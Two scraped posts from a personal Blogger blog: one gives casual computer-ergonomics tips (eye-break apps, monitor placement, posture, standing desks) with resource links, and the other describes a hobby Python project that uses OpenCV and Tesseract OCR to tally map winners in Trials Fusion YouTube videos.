<span style="font-family: Arial, Helvetica, sans-serif;">One of the main things you do when using a computer is staring at your screen. I'm not sure if this affects your vision long-term or not but it may certainly cause strain or dry eyes. There are applications you can install to remind you to look away or take a break from staring at your screen. These applications include Workrave (http://www.workrave.org/) and Eyeleo (http://eyeleo.com/). There are more if you check AlternativeTo (https://alternativeto.net/). I have used Workrave in the past but currently, I use Eyeleo. Depending on your settings, Eyeleo will give you a popup about various eye movements (rolling your eyes for example) or looking away. Workrave also gives you popup about doing exercises at your desk. You may have to tune the time settings to make sure the popups don't get too annoying and you can still remain productive. </span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">You can also adjust your screen brightness level depending on the light level around you. Android phones and tablets usually have an option to adjust brightness based on the sensor included on the phone. Another thing you can do is use a blue light filter option on your devices. Again, Android phones and tablets may include this option in their settings as well. For Windows, I use f.lux (https://justgetflux.com/), which is pretty popular. It will adjust your screen color based on the time of day. </span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">Finally, you can get computer glasses that are designed for computer users. I'm pretty sure they protect your eyes from the blue light, besides that, I'm not 100% sure what else is different about them. Additional features or protections may depend on the manufacturer I guess. </span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">"Protect Ya Neck" - Wu Tang Clan</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">You may get neck issues depending on how your monitor is positioned/angled. Make sure your monitor is in front of you and you don't have to keep your neck tilted or twisted to view it. Position the monitor so you're not getting glare or reflection. Keep your monitor clean as well. Keep in mind the height and distance of the monitor compared to your eye level. You shouldn't have to bend your neck down to view what's on the screen. Check the resources for more information on setting up your monitor. </span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">Pay attention to your posture when using a computer. Make sure you're not cutting off or reducing blood circulation to your hands because of the way you're using the keyboard. Try to keep your back straight. Keep your forearms and wrists aligned with the keyboard and mouse. Your feet should be flat against the ground. Check the links in the resources for a diagram. </span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Arial, Helvetica, sans-serif;"><iframe width="320" height="266" class="YOUTUBE-iframe-video" data-thumbnail-src="https://i.ytimg.com/vi/wfMan8d5240/0.jpg" src="https://www.youtube.com/embed/wfMan8d5240?feature=player_embedded" frameborder="0" allowfullscreen></iframe></span></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">Instead of sitting all day, you can also stand at your desk. Adjustable standing desks exist, you can also buy kits that convert your desk into an adjustable standing desk. If you do utilize a standing desk, make sure not to stand ALL day and switch between sitting and standing. Also, if you're standing, use an anti-fatigue mat to stand on. </span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">Ergonomic keyboard and mouse may make your hands more comfortable when using a computer. Ergonomic keyboard and mouse can be used with your natural hand position and may help prevent carpal tunnel (not sure how true that is). There are many options out there when it comes when it comes to ergonomic keyboard and mouse, you may just have to test and find what feels most comfy to you. </span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">Some workplaces may have people in charge of ergonomics/human factor or occupational health. I've worked at a place that has had people like that. They can help make sure your work environment is comfortable and safe. Check with HR. </span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">That's all! Hopefully, some of the information was useful to whomever that's reading this. Links in the resources are probably more helpful.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<b><span style="font-family: Arial, Helvetica, sans-serif;">Resources:</span></b><br />
<a href="http://www.workrave.org/"><span style="font-family: Arial, Helvetica, sans-serif;">http://www.workrave.org/</span></a><br />
<a href="http://eyeleo.com/"><span style="font-family: Arial, Helvetica, sans-serif;">http://eyeleo.com/</span></a><br />
<a href="https://alternativeto.net/software/eyeleo/"><span style="font-family: Arial, Helvetica, sans-serif;">https://alternativeto.net/software/eyeleo/</span></a><br />
<a href="https://alternativeto.net/software/workrave/"><span style="font-family: Arial, Helvetica, sans-serif;">https://alternativeto.net/software/workrave/</span></a><br />
<a href="https://justgetflux.com/"><span style="font-family: Arial, Helvetica, sans-serif;">https://justgetflux.com/</span></a><br />
<a href="https://www.digitaltrends.com/mobile/how-to-use-blue-light-filter-phone/"><span style="font-family: Arial, Helvetica, sans-serif;">https://www.digitaltrends.com/mobile/how-to-use-blue-light-filter-phone/</span></a><br />
<a href="https://ergo-plus.com/office-ergonomics-position-computer-monitor/"><span style="font-family: Arial, Helvetica, sans-serif;">https://ergo-plus.com/office-ergonomics-position-computer-monitor/</span></a><br />
<a href="https://www.ccohs.ca/oshanswers/ergonomics/office/monitor_positioning.html"><span style="font-family: Arial, Helvetica, sans-serif;">https://www.ccohs.ca/oshanswers/ergonomics/office/monitor_positioning.html</span></a><br />
<a href="https://www.spineuniverse.com/wellness/ergonomics/workstation-ergonomic-tips-computer-monitors-posture"><span style="font-family: Arial, Helvetica, sans-serif;">https://www.spineuniverse.com/wellness/ergonomics/workstation-ergonomic-tips-computer-monitors-posture</span></a><br />
<a href="http://www.healthycomputing.com/office/setup/monitor/"><span style="font-family: Arial, Helvetica, sans-serif;">http://www.healthycomputing.com/office/setup/monitor/</span></a><br />
<a href="https://lifesworkpt.com/2018/03/proper-computer-posture/"><span style="font-family: Arial, Helvetica, sans-serif;">https://lifesworkpt.com/2018/03/proper-computer-posture/</span></a><br />
<a href="https://www.wikihow.com/Sit-at-a-Computer"><span style="font-family: Arial, Helvetica, sans-serif;">https://www.wikihow.com/Sit-at-a-Computer</span></a><br />
<a href="http://ergonomictrends.com/proper-sitting-posture-computer-experts/"><span style="font-family: Arial, Helvetica, sans-serif;">http://ergonomictrends.com/proper-sitting-posture-computer-experts/</span></a><br />
<a href="https://www.mayoclinic.org/healthy-lifestyle/adult-health/in-depth/standing-workstation/art-20088544"><span style="font-family: Arial, Helvetica, sans-serif;">https://www.mayoclinic.org/healthy-lifestyle/adult-health/in-depth/standing-workstation/art-20088544</span></a><br />
<a href="https://www.uclahealth.org/safety/sitting-to-standing-workstations"><span style="font-family: Arial, Helvetica, sans-serif;">https://www.uclahealth.org/safety/sitting-to-standing-workstations</span></a><br />
<a href="https://www.doityourself.com/stry/choosing-the-best-ergonomic-keyboard-five--essential-features"><span style="font-family: Arial, Helvetica, sans-serif;">https://www.doityourself.com/stry/choosing-the-best-ergonomic-keyboard-five--essential-features</span></a><br />
<br />Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8341113811870246566.post-79838355777279906092018-06-01T19:49:00.001-07:002018-06-01T19:49:28.612-07:00Extracting winner info from gameplay video with OpenCV and Tesseract OCR<span style="font-family: Arial, Helvetica, sans-serif;">A long time ago, while I was on Youtube, I came across a video of Trials Fusion gameplay on a channel named "CaptainSparklez." In this video, two players are playing Trials Fusion to win. There is a playlist full of videos of CaptainSparklez and NFEN playing Trials Fusion. I thought it would be cool to see if I could use OpenCV and OCR to figure out who won which maps or at least who won a map. </span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">Typically, the winner information is presented as shown below:</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span id="docs-internal-guid-30fdca2d-be16-7d14-1e52-6d3e138f69b2"><span style="font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: Arial, Helvetica, sans-serif;"><img height="344" src="https://lh4.googleusercontent.com/jNL4Zn7NMhuVI6l4dC12EBnuMg-pxjaGIqhiNvPPEP2V43EiEhc4TdamJIw5VkY1dEKkdrxnD2DpSZk12xLSD7AYIPzlh_Toe7TZb9dIrWHgwSlHttKBMdUlYV8F7MBirDWWh0oo" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="624" /></span></span></span><br />
<span><span style="font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></span></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><span><span style="font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">(from video: </span></span><span style="white-space: pre-wrap;">https://www.youtube.com/watch?v=W528UyfC42k)</span></span><br />
<span style="white-space: pre-wrap;"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></span>
<span style="white-space: pre-wrap;"><span style="font-family: Arial, Helvetica, sans-serif;">As you can see in the screenshot above, there is a specific area where map and winner information is presented. To extract that specific information, I used Python, OpenCV, and Tesseract OCR. OpenCV will allow me to process the videos and Tesseract OCR will be able to extract the information for me.</span></span><br />
<span style="white-space: pre-wrap;"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></span>
<span style="white-space: pre-wrap;"><span style="font-family: Arial, Helvetica, sans-serif;">OpenCV allows you to view a file frame by frame and the code example is shown here: https://docs.opencv.org/3.0-beta/doc/py_tutorials/py_gui/py_video_display/py_video_display.html#playing-video-from-file</span></span><br />
<span style="white-space: pre-wrap;"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></span>
<span style="white-space: pre-wrap;"><span style="font-family: Arial, Helvetica, sans-serif;">Here's what it looks like when I process the video:</span></span><br />
<span style="white-space: pre-wrap;"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></span>
<span id="docs-internal-guid-3e9e8bce-be20-b6a2-7f75-2305fe78b7a6"><span style="font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: Arial, Helvetica, sans-serif;"><img height="421" src="https://lh6.googleusercontent.com/tvsLbmQ2RgSy88YN1Jq8hGQVCYGEmFGQoExSyBIgyc0rkzJ8RtNkFlNyl0YQ27AcUgMlsaefxDxNC_zKYTwNWhEYi8LUqXnMxHyXg5UvrPhaNaZkCMovP3hsc2Im7dO3ou4R2nd8" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="624" /></span></span></span><br />
<span><span style="font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></span></span>
<span style="white-space: pre-wrap;"><span style="font-family: Arial, Helvetica, sans-serif;">In the screenshot above, we have 720p video (after some testing, I found out that 720p was probably the best choice for this) and frame extracted from that video. Since I'm just interested in the area of the frame that contains map and winner information I decided to crop that area.</span></span><br />
<span style="white-space: pre-wrap;"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></span>
<span style="white-space: pre-wrap;"><span style="font-family: Arial, Helvetica, sans-serif;">This post has more information on how to crop: https://www.pyimagesearch.com/2014/01/20/basic-image-manipulations-in-python-and-opencv-resizing-scaling-rotating-and-cropping/</span></span><br />
<span style="white-space: pre-wrap;"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></span>
<span style="white-space: pre-wrap;"><span style="font-family: Arial, Helvetica, sans-serif;">After cropping the frame appears as shown below:</span></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><span id="docs-internal-guid-efc56a08-be25-b40e-cc5b-02d5e1b1f1ed"><span style="font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"></span></span><span id="docs-internal-guid-4dd39593-be25-c2fe-f2ae-c869f09bd80c"><span style="font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><img height="357" src="https://lh5.googleusercontent.com/92hFU3xfAiOGLgaFfRef0fo0_CZtZRRmqDUS1L4Twsb7gMKZdFYkwmhDKUTyvdPe4gX6jHFNgKArhwvDmxKFweuHnr5RQr_xbyzylqb-k6MiIm1YCnoXa6DR-UfA0Fr_bGWsNerK" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="624" /></span></span></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="white-space: pre-wrap;"><span style="font-family: Arial, Helvetica, sans-serif;">After I had the cropping part working correctly, I decided to do OCR with tesseract. OpenCV allows you to convert the frame to grayscale or black and white. I tested OCR with both gray and black and white frames and it did not make too much of a difference in the output from OCR.</span></span><br />
<span style="white-space: pre-wrap;"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></span>
<span style="white-space: pre-wrap;"><span style="font-family: Arial, Helvetica, sans-serif;">To have tesseract OCR analyze the frame, the following has to be done:</span></span><br />
<span style="white-space: pre-wrap;"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></span>
<span style="white-space: pre-wrap;"><span style="font-family: Arial, Helvetica, sans-serif;">image = Image.fromarray(frame)</span></span><br />
<span style="white-space: pre-wrap;"><span style="font-family: Arial, Helvetica, sans-serif;">str_out = tesserocr.image_to_text(image)</span></span><br />
<span style="white-space: pre-wrap;"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></span>
<span style="white-space: pre-wrap;"><span style="font-family: Arial, Helvetica, sans-serif;">Here are some issues with doing OCR that I had while doing this:</span></span><br />
<br />
<ul>
<li><span style="white-space: pre-wrap;"><span style="font-family: Arial, Helvetica, sans-serif;">You'll be extracting information about the current race, such as time, player name, and faults.</span></span></li>
<li><span style="white-space: pre-wrap;"><span style="font-family: Arial, Helvetica, sans-serif;">Processing each frame is a bad idea and wastes a lot of resources</span></span></li>
<li><span style="white-space: pre-wrap;"><span style="font-family: Arial, Helvetica, sans-serif;">Looking for "wins" and "Player" in the OCR output is a good idea but you may see that every frame for that one map (for example, seeing frame 99 then 100 with similar OCR output)</span></span></li>
<li><span style="white-space: pre-wrap;"><span style="font-family: Arial, Helvetica, sans-serif;">If you look for "wins" and "Player" and skip frames, you may end up skipping too much and missing results</span></span></li>
<li><span style="white-space: pre-wrap;"><span style="font-family: Arial, Helvetica, sans-serif;">Sometimes winner players information is picked up but not the map information</span></span></li>
</ul>
<span style="font-family: Arial, Helvetica, sans-serif;">Here's the process I ended up using for extracting information as accurately as I can:</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">I process every 50 frames. If OCR of the frame contains "wins" then I process OCR data further. Check each line from OCR output, if the line contains "wins" and "Player" then figure out the player who won. If the line does not contain "wins" and "Player" then it's obviously a map name. Concatenate map name, player name, and video name into one variable and print it. There is another part that keeps track of frame number that we successfully extracted the map and the player information out of. Full extraction in OCR frame only happens if the new frame is 500 frames after the last successful extraction frame number. This is implemented so after 50 frames, we don't re-extract the same map and player information but at the same time, since we're processing every 50th frame, we won't miss an outcome of a map. The process is hard to explain so definitely look at the code. </span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">The results:</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">165 videos were processed. 670 maps were seen by the script.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">NFEN won 291 maps. CaptainSparklez won 371 maps. Mark/YYFakieDualCom (script didn't look for this username) won 8 maps.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">Script and the results are posted on Github: https://github.com/BoredHackerBlog/TrialsFusionOCR</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">Anyways, this was a fun and interesting side project for me. There are definitely ways to improve this. For example, OCR isn't perfect and tesseract could have been trained to extract better data. Also, the code could probably be optimized or be written in a different language like C++ or Golang to get better performance. </span><br />
Unknownnoreply@blogger.com